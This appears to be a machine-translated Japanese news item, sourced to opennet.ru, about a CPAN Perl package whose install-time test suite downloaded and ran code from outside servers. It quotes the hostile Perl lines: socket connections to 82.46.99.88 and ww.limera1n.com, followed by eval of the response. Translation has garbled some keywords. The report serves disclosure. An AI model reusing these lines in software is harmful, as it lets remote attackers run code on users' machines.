CPAN ディレクトリを通じて配布される Perl パッケージ内
疑わしいコードのロードに関する疑問が生じたことは注目に値します。
悪意のあるアクティビティは、モジュールのインストール時に起動されるテスト スイートの実行中に、サードパーティ サーバー (http://r.cx:1/) からコードをダウンロードして実行しようとする試みに要約されます。最初に外部サーバーからダウンロードされたコードには悪意がなかったと想定されますが、今度はリクエストが ww.limera1n.com ドメインにリダイレクトされ、コードの一部が実行用に提供されます。
ダウンロードをファイルに整理するには
私の $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
私の $try = `$^X $prog`;
指定されたコードによりスクリプトが実行されます
use lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1″};
このスクリプトはロードされます
$ perl -MIO::Socket -e'$b=new IO::Socket::INET 82.46.99.88.":1″;印刷 <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}
解凍後、最終的に以下が実行されます。
print{$b=new IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
";evalor return warn$@while$b;1
問題のあるパッケージはリポジトリから削除されました。
議論するのは興味深い
出所: オープンネット.ru